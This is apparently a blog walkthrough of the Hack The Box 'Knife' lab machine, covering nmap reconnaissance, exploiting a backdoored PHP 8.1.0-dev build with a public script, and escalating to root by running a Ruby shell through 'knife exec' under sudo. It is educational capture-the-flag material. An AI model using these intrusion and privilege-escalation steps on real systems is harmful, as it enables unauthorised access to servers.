HTB Knife Walkthrough

Get a quick walkthrough of the Knife machine provided by hack the box and learn how I owned the machine in less than 10 minutes

HTB Knife Walkthrough

Welcome to my first post on the HTB walkthrough. In this post, I will discuss how I have owned this machine in less than 10 minutes. This machine was very beginner-friendly and tests your google search skills and was based on exploiting a very trivial vulnerability that leads to compromising the server

Link of the machine: https://app.hackthebox.eu/machines/Knife

Reconnaissance

Using Nmap initially to find open ports and services

nmap -d -p- -Pn -sV -T4 10.10.10.242
Results of Nmap scan

From the experience, I don't find much information on SSH, so let's skip it and focus on the HTTP port as of now

Website hosted on the HTTP port

So, on checking this application and running dirbuster for the most common 1000 directories and files, I found nothing. So it means, we need to enumerate the service even more.

Let's start with the HTTP headers. If you are new to recon using Nmap, I have already written some articles on secjuice. Feel free to read those after this.

nmap -p80 --script http-headers 10.10.10.242
Found vulnerable php version

Everything seems OK, but the -dev in php version appeared juicy. So, I had searched on google regarding this

Searching for the php exploit

So, the first link was sufficient in exploiting this service.

Initial Foothold

After cloning the Github repository, and execute the following file

$ python3 backdoor_php_8.1.0-dev.py
Initial foothold POC


You can go ahead and retrieve the flag

Privilege Escalation

This is my first technique in the Linux toolbox is to check and abuse sudo misconfigs. To check the current user permissions use sudo -l

Sudo privileges check

On google search, again, I found that knife is an automation framework that is created by the chef team and is written in ruby. Also, one more thing I found is that you can execute any ruby script with it

Knife exec subcommand documentation

Now all you have to do is

  • Get interactive shell, use revshell_php_8.1.0-dev.py
  • Save the ruby file to spawn shell (https://netsec.ws/?p=337)
  • Execute it with knife and sudo to get escalated shell
  • Retrieve the flag of the root user

To know more about the working of sudo and how to exploit the misconfiguration in the sudoers file. I would recommend you to read these two posts – Understanding sudo in Linux and Exploiting Sudo Misconfigurations

References